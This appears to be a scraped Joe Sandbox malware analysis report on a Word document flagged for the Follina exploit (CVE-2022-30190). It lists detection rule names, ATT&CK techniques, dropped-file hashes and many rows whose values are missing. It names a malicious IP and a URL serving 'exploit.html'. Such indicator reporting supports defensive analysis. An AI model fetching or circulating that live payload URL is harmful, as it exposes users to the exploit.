Windows
Analysis Report
V3g2Pfu707.docx
Overview
General Information
Detection
Score: | 76 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 2096 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Doc_WordXMLRels_May22 | Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard, Wojciech Cieslak |
| |
INDICATOR_OLE_RemoteTemplate | Detects XML relations where an OLE object is refrencing an external target in dropper OOXML documents | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | ||
EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 | Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation | Tobias Michalski, Christian Burkard |
| |
Click to see the 1 entries |
Click to jump to signature section
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Extracted files from sample: |
Source: | File opened: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic: |
Networking |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
System Summary |
---|
Source: | Matched rule: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | Virustotal: |
Source: | LNK file: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | OLE document summary: | ||
Source: | OLE document summary: | ||
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Persistence and Installation Behavior |
---|
Source: | Extracted files from sample: |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 12 Exploitation for Client Execution | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 11 Non-Standard Port | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 11 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Ingress Tool Transfer | SIM Card Swap | Carrier Billing Fraud |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
34% | Virustotal | Browse |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
101.33.231.81 | unknown | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | true |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 647003 |
Start date and time: 16/06/202214:13:24 | 2022-06-16 14:13:24 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 42s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | V3g2Pfu707.docx |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 4 |
Number of new started drivers analysed: | 1 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal76.troj.expl.evad.winDOCX@1/21@0/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtSetValueKey calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2877652670790817 |
Encrypted: | false |
SSDEEP: | 384:57OTylnrIrEtgN7jrQfv61Nl4zyfv61Nl4zE: |
MD5: | 6904AB7DE9425713FAD0A11309750D7C |
SHA1: | 35141FFA3C07A5303AD32824CBD297816211A3D7 |
SHA-256: | 295E03A904581A4EB96842A2134FC6A26F126B6E3241A3DDE113733E925EA575 |
SHA-512: | 1F1D1C9ECD512366386652D03639747705BA949D0E1B337E79B6C0C3EA6D454ECD4B21A9B8A5D9A68C3F0D50B5BE1A0DB3554A6ECF21DED96672205242A38A1E |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{95873921-7BBD-4EBD-8008-620874EEAE52}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.6717296200874917 |
Encrypted: | false |
SSDEEP: | 192:MEf2WSk7edemeEpFeleUgCGliaejealwO1e0eceke:C6KRxFGXta03lwC5vR |
MD5: | 3BF0E4123ADB4A2FCCB85908E1CB24D1 |
SHA1: | F47D6079F6DC2D17589ED5D436D14E29C2965227 |
SHA-256: | 120522FAFFF9C768FB5B3FA42A1CCA5E96A9BC880AEE5AB776C285EAF6471E9F |
SHA-512: | 487F0673870B81CA31F8E8C7D3F12DE298BB5E21E3969C7199BEE498BFFE40F9B0CFF4D3DA185A0C1BDDF270E1FC7E327675F41FE7D856C80D4DB8A20F063780 |
Malicious: | false |
Reputation: | low |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.9759175009021157 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlzDlDUXOlYSlHhW8HhWPVylDSlRl/kOQ325l276:yPblzKeVlHs8HsPAlelDsOQQ22 |
MD5: | AFA0867887D275F27B3FA70C0F942FC0 |
SHA1: | 3C7AF5E31DDC45D61D43561837B02ED26B13430E |
SHA-256: | C57A04A07989D8CD43974C5A181B13B22A7D6EF1DCC8793671EF658233EB1FD6 |
SHA-512: | 43B51CCB46AE0EFBB5BD65413EEA85194C482426E85C7EACD827DB6012FD06BDFBB201B7B62BECA100E075EB68345F50342C35F98B8A98BD864087C18F7CFF60 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.2886870567135295 |
Encrypted: | false |
SSDEEP: | 1536:1TUrO5yRZOjUWuGfgAi0cEFQPgAi0cEFQ: |
MD5: | B57D30725B2A79ECC6744451F452D8D2 |
SHA1: | E8E52504FE81E162411239F1A737DCA3232F700C |
SHA-256: | 2A1CB4708DB0A4AE9BF3DF4FCC5301BB0B43863E91F5565A3B0441841934CB19 |
SHA-512: | D7B9049BDBC0DF6A372FB1886A5783FB38F79CB79FA5D9E179D2BE548E4DC079D38590FC68302FAFAA2AB8BEAB8DC5C29A9349E0E2FC574318411E0C94F610D3 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{55CA3E23-CD6A-4540-AFBA-3E4A75CEA258}.FSD
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.22209779392510887 |
Encrypted: | false |
SSDEEP: | 48:I3XoUrB6QfKX2CZMG0Wrvoc92ZpasGe4b0embxEembxQ:KYCJSmHja9cpas4b0DbuDby |
MD5: | E0D373C595CA45292224DA7DDF83E5E7 |
SHA1: | 1F89FDBCB9D1D102A6598B1852F7FF0C2DB5F0E0 |
SHA-256: | 25436C64113984DC90AF1D89B8F41EF40858241EF66E7BD2C3AD71C71D8E2010 |
SHA-512: | 29BF632FEE98102379F1C2FE448FAB6C4E59F4C36970D9D13AAE5B5FFE482D3A6D421F1E8AA25097DE40D123D941899C3DE2BB491134B3CB5112B816C2CE39B9 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 114 |
Entropy (8bit): | 3.917766707190794 |
Encrypted: | false |
SSDEEP: | 3:yVlgsRlz91JMlIu5YdYk5llsYDl+ps1o87276:yPblz91CS9YkZs2l+psF22 |
MD5: | 1A06AA9F916046C17E5DA867F5AB3408 |
SHA1: | 173C5E0069A81E2808BD8FE29FCF01A7B19F6944 |
SHA-256: | 74D692C4ED606EDDD9870A8DC9D087FCEE25D02400933E62C45E6A354576FE17 |
SHA-512: | 0D0E0630CF94521A939876AF6E0BFC6AA3B2A05ECE47B56CD5300EF99A5E99F630299A3C9ECE8939CF9BBF34CF2E195E33FAC6556A500E4D652DF2A339E1CD94 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\exploit[1].htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 5737 |
Entropy (8bit): | 4.627210073550201 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu |
MD5: | 4C00910BAF865F5D0D7F37F77816B375 |
SHA1: | ADA759E7A00B362553580A89269201257BD6F9E0 |
SHA-256: | 32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153 |
SHA-512: | 9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27 |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
IE Cache URL: | http://101.33.231.81:62563/exploit.html |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42A30EFB.htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5737 |
Entropy (8bit): | 4.627210073550201 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu |
MD5: | 4C00910BAF865F5D0D7F37F77816B375 |
SHA1: | ADA759E7A00B362553580A89269201257BD6F9E0 |
SHA-256: | 32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153 |
SHA-512: | 9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27 |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6B087DC1.htm
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5737 |
Entropy (8bit): | 4.627210073550201 |
Encrypted: | false |
SSDEEP: | 96:t/iGBF2nPW5mDtWID8qImz1I8vHWYMLJS2lpyffnbTc7Oi/EAEwC8EA5KiSe+0gz:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiu |
MD5: | 4C00910BAF865F5D0D7F37F77816B375 |
SHA1: | ADA759E7A00B362553580A89269201257BD6F9E0 |
SHA-256: | 32EC74CCEFC7D7FEB5C8817097652FC6014C6217F5B6A2695A95E680D6958153 |
SHA-512: | 9C69E8FA9E1F27C6AB0E464A2E7CD1F89E5CACF671A775DC55045A19F3D5DAE98AF5EF3E973FA021DC7E933505AC8B706EA0F8DDB371BB7414E7A75CF933BE27 |
Malicious: | true |
Yara Hits: |
|
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83357E0C.jpeg
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 29235 |
Entropy (8bit): | 7.203733489330109 |
Encrypted: | false |
SSDEEP: | 384:+++r9RfjoOtgBku0d/8wAXLBw75uh62w+ccO+RJPBDJPKQELXu59ghnt8zgmM4CM:++ORjosugKi75u6+vJpDJCBOUK |
MD5: | D7773EE5D4BDFEE97EB233BC5C35C0AA |
SHA1: | 51FFFFC7973C3F4EF6B0B153D66293C1CB8195E7 |
SHA-256: | F6D0AC498CDE70CFBE4F7DF6B86772BC5CFD43F835D09E0C9570D94801917332 |
SHA-512: | 9A0843F34E331B103083A8698C97C76CF99EC05BF83266004DF9D55A7596C39F530E1CCF26B9095461A4552F9B146A746C3651A3135D0F6B647A324A122BF04E |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F1DC677.jpeg
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 492596 |
Entropy (8bit): | 7.89552218174887 |
Encrypted: | false |
SSDEEP: | 12288:rA4G7o32/nTnZurIM8gdYjhNSduRYjeqw3C7Nv:Mx7o32/VeZJj5 |
MD5: | 90BE6B795828441DF1C995671289E431 |
SHA1: | 7368012CA949A57238DC158C0FEF24A2EFCEB359 |
SHA-256: | 4A6A787D4BCE57A66828EB9F0F76A6FCAC265A97E6D091AFA150AAD19885C05B |
SHA-512: | 9DD8D38314E5C40E68DE3B0C0037EA7C0000F25125C37AC9DB95B5638FB4EEAEB35690F11CC51FD958645D84758698040B0A8CB2BA8A1BF60920B121068AD446 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{6245E340-9A7D-4D8C-95F3-E607A94CA060}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 6144 |
Entropy (8bit): | 2.1877115376323406 |
Encrypted: | false |
SSDEEP: | 48:rQ6PBvJBgJB5ihRmJB5ixBvJBegJB5ixBvJB:c6PNgohRWoxNegoxN |
MD5: | C1EFD08AF15B2646E7E58B4ED1DA37D8 |
SHA1: | 716F3C64BC8EA1044AB10F2771A59A782868DB1F |
SHA-256: | 1AF69959BF135AA7497CB75BC54929B742E8E6AB162CD9162AEB306537D65C2E |
SHA-512: | E0B1F37634E6BC746BD92E3AB72896A4E1F372B2E9523163DEB2608E99F30D5275697702EECFE98FA1941D1E8D98F3BB051510719472E93662418A6BDCA0127F |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6A4592DE-D21D-4642-AE77-FFCC3AAD3185}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F19FE166-8B13-4DD0-BB8B-900FB9050402}.tmp
Download File
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1824 |
Entropy (8bit): | 2.1075477514780117 |
Encrypted: | false |
SSDEEP: | 12:ijs/5M4yZlIbb28RPTtBAwJvbZE9Qf5l6exZEk7Af6BG8Xu2W26:2s/5HyZ+bbHNXAwJeUl6eckBBJ+2o |
MD5: | 20E3896F9ACE5C8E16F06D39C7E6192F |
SHA1: | 3DC106A18E328D474631281AED5B33C3AC0CA9AA |
SHA-256: | DA442265AF95FD57EA0F40A2B15A5E89D9710124219B3CE1CE02B769BAA36A8A |
SHA-512: | AC1EC2683B073F7E570C6E1498CBC974924B5FBCAA1B16D9A780932CB08843F0F3CFB37E4BC31D810BB2CBD917A8AB26E179D874F2EC5B18303186D69B1FADD4 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 663 |
Entropy (8bit): | 5.949125862393289 |
Encrypted: | false |
SSDEEP: | 12:PlrojAxh4bxdtT/CS3wkxWHMGBJg8E8gKVYQezuYEecp:trPsTTaWKbBCgVqSF |
MD5: | ED3C1C40B68BA4F40DB15529D5443DEC |
SHA1: | 831AF99BB64A04617E0A42EA898756F9E0E0BCCA |
SHA-256: | 039FE79B74E6D3D561E32D4AF570E6CA70DB6BB3718395BE2BF278B9E601279A |
SHA-512: | C7B765B9AFBB9810B6674DBC5C5064ED96A2682E78D5DFFAB384D81EDBC77D01E0004F230D4207F2B7D89CEE9008D79D5FBADC5CB486DA4BC43293B7AA878041 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025588219588519305 |
Encrypted: | false |
SSDEEP: | 6:I3DPcUsR97FvxggLRw7WkpRXv//4tfnRujlw//+GtluJ/eRuj:I3DPB+p0qkHvYg3J/ |
MD5: | 4E336F926B821EB3BC7357B677623E4B |
SHA1: | 53212F37EB180DBCD825A0D95F02FA21C5A00354 |
SHA-256: | E432B8B0C8E2378220326628A8E944A71760BE408E13E3AE873E051275E55B5E |
SHA-512: | 0F3E93DFAE7BC4D5FF448C68DB515360A72FA99B0038D9762804ADE9DDD9974B860A4736DC5BD6179D99DE7B57AC4F725CE5C761FFA278C5A791286ED090FF94 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 131072 |
Entropy (8bit): | 0.025535921973679574 |
Encrypted: | false |
SSDEEP: | 6:I3DPc1xb2xFvxggLRNGgSo/RXv//4tfnRujlw//+GtluJ/eRuj:I3DP0b0pJPSopvYg3J/ |
MD5: | 84E60871A4908F5C2C5744274A0DD3C2 |
SHA1: | 274CFF227D6AD39DA4B2B806E88E6DDD35D87D1B |
SHA-256: | E81789A9C4F526731E91F97DBDD6EBCC1387BB060BF4AF538D7DE342293358FD |
SHA-512: | E0AB0A6D9E803C7C709AED603F74BE45A43EA6C8B03AA562C66839C6DD7B00642E03D514BE415890EAA3641407C8221B05A94628FD492DFB24F70F922CBB6E90 |
Malicious: | false |
Preview: |
